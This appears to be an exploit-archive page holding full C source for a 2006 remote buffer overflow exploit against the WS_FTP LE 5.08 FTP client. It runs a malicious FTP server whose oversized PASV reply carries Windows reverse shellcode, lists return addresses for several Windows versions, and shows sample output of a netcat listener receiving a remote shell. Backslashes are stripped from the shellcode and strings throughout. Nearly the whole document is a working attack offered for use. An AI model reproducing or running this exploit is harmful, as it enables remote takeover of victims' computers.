[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WS_FTP LE 5.08 (PASV response) Remote Buffer Overflow Exploit
# Published : 2006-09-20
# Author : h07
# Previous Title : MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2k3)
# Next Title : MS Internet Explorer COM Object Remote Heap Overflow Exploit
/*
ws_exp.c
WS_FTP LE 5.08 (PASV response) 0day buffer overflow exploit
Coded by h07 <h07@interia.pl>
Tested on XP SP2 Polish, 2000 SP4 Polish
Example:
C:>ws_exp 1 192.168.0.1 4444
[*] WS_FTP LE 5.08 (PASV response) 0day buffer overflow exploit
[*] Coded by h07 <h07@interia.pl>
[+] Listening on 21
[+] Connection accepted from 192.168.0.3
[+] Client request: USER h07
[+] Client request: PWD
[+] Client request: SYST
[+] Client request: HELP
[+] Client request: PASV
[+] Sending buffer: OK
[*] Press enter to quit
C:>nc -v -l -p 4444
listening on [any] 4444 ...
connect to [192.168.0.1] from (UNKNOWN) [192.168.0.3] 2809: NO_DATA
Microsoft Windows 2000 [Wersja 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:Program FilesWS_FTP>
*/
#include <winsock2.h>
#define PORT 21
#define BUFF_SIZE 1024
#define RESPONSE "200 blah blahrn"
typedef struct
{
char os_name[32];
unsigned long ret;
} target;
char shellcode[] =
/*
win32 reverse shellcode (thx metasploit.com)
bad chars: 0x00 0x20 0x0a 0x0d 0x28 0x29
*/
"x2bxc9x83xe9xb8xd9xeexd9x74x24xf4x5bx81x73x13x87"
"x61xbcxd8x83xebxfcxe2xf4x7bx0bx57x95x6fx98x43x27"
"x78x01x37xb4xa3x45x37x9dxbbxeaxc0xddxffx60x53x53"
"xc8x79x37x87xa7x60x57x91x0cx55x37xd9x69x50x7cx41"
"x2bxe5x7cxacx80xa0x76xd5x86xa3x57x2cxbcx35x98xf0"
"xf2x84x37x87xa3x60x57xbex0cx6dxf7x53xd8x7dxbdx33"
"x84x4dx37x51xebx45xa0xb9x44x50x67xbcx0cx22x8cx53"
"xc7x6dx37xa8x9bxccx37x98x8fx3fxd4x56xc9x6fx50x88"
"x78xb7xdax8bxe1x09x8fxeaxefx16xcfxeaxd8x35x43x08"
"xefxaax51x24xbcx31x43x0exd8xe8x59xbex06x8cxb4xda"
"xd2x0bxbex27x57x09x65xd1x72xccxebx27x51x32xefx8b"
"xd4x22xefx9bxd4x9ex6cxb0x87x61xbcxd8xe1x09xbcxd8"
"xe1x32x35x39x12x09x50x21x2dx01xebx27x51x0bxacx89"
"xd2x9ex6cxbexedx05xdaxb0xe4x0cxd6x88xdex48x70x51"
"x60x0bxf8x51x65x50x7cx2bx2dxf4x35x25x79x23x91x26"
"xc5x4dx31xa2xbfxcax17x73xefx13x42x6bx91x9exc9xf0"
"x78xb7xe7x8fxd5x30xedx89xedx60xedx89xd2x30x43x08"
"xefxccx65xddx49x32x43x0exedx9ex43xefx78xb1xd4x3f"
"xfexa7xc5x27xf2x65x43x0ex78x16x40x27x57x09x4cx52"
"x83x3exefx27x51x9ex6cxd8";
char buffer[BUFF_SIZE];
target list[] =
{
"XP SP2 Polish",
0x7d16887b, //JMP ESI
"2000 SP4 Polish",
0x776f2015, //JMP ESI
"XP SP2 English",
0x7cb9e082, //JMP ESI
"2000 SP4 English",
0x7848a5f1, //JMP ESI
"XP SP2 German",
0x7ca96834 //JMP ESI
};
void config_shellcode(unsigned long ip, unsigned short port)
{
memcpy(&shellcode[184], &ip, 4);
memcpy(&shellcode[190], &port, 2);
}
int main(int argc, char *argv[])
{
WSADATA wsa;
int sock, cl, len, os, r_len, i,
a = (sizeof(list) / sizeof(target)) - 1;
unsigned long connectback_IP, eip;
unsigned short connectback_port;
struct sockaddr_in server, client;
printf("n[*] WS_FTP LE 5.08 (PASV response) 0day buffer overflow exploitn");
printf("[*] Coded by h07 <h07@interia.pl>n");
if(argc < 4)
{
printf("[*] Usage: %s <system> <connectback_IP> <connectback_port>n", argv[0]);
printf("[*] Sample: %s 0 192.168.0.1 4444n", argv[0]);
printf("[*] Systems..n");
for(i = 0; i <= a; i++)
printf("[>] %d: %sn", i, list[i].os_name);
return 1;
}
WSAStartup(MAKEWORD(2, 0), &wsa);
os = atoi(argv[1]);
if((os < 0) || (os > a))
{
printf("[-] Error: unknown target %dn", os);
return -1;
}
eip = list[os].ret;
connectback_IP = inet_addr(argv[2]) ^ (ULONG)0xd8bc6187;
connectback_port = htons(atoi(argv[3])) ^ (USHORT)0xd8bc;
config_shellcode(connectback_IP, connectback_port);
if((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
{
printf("[-] Socket errorn");
return -1;
}
server.sin_family = AF_INET;
server.sin_addr.s_addr = htonl(INADDR_ANY);
server.sin_port = htons(PORT);
bind(sock, (struct sockaddr *) &server, sizeof(server));
listen(sock, 1);
printf("[+] Listening on %dn", PORT);
len = sizeof(client);
cl = accept(sock, (struct sockaddr *) &client, &len);
printf("[+] Connection accepted from %sn", inet_ntoa(client.sin_addr));
send(cl, "200 evil server ready :>rn", 26, 0);
for(i = 0; i <= 3; i++)
{
memset(buffer, 0x00, BUFF_SIZE);
recv(cl, buffer, BUFF_SIZE - 1, 0);
printf("[+] Client request: %s", buffer);
send(cl, RESPONSE, strlen(RESPONSE), 0);
}
//PASV request
memset(buffer, 0x00, BUFF_SIZE);
recv(cl, buffer, BUFF_SIZE - 1, 0);
printf("[+] Client request: %s", buffer);
//PASV response
r_len = 1011;
memset(buffer, 0x90, BUFF_SIZE);
memcpy(buffer, "200 x31xc0", 6);
memcpy(buffer + 6, shellcode, sizeof(shellcode) - 1);
*((unsigned long*)(&buffer[r_len])) = eip;
memcpy(buffer + (r_len + 4), "rnx00", 3);
if(send(cl, buffer, strlen(buffer), 0) != -1)
printf("[+] Sending buffer: OKn");
else
printf("[-] Sending buffer: failedn");
printf("[*] Press enter to quitn");
getchar();
return 0;
}
// www.Syue.com [2006-09-20]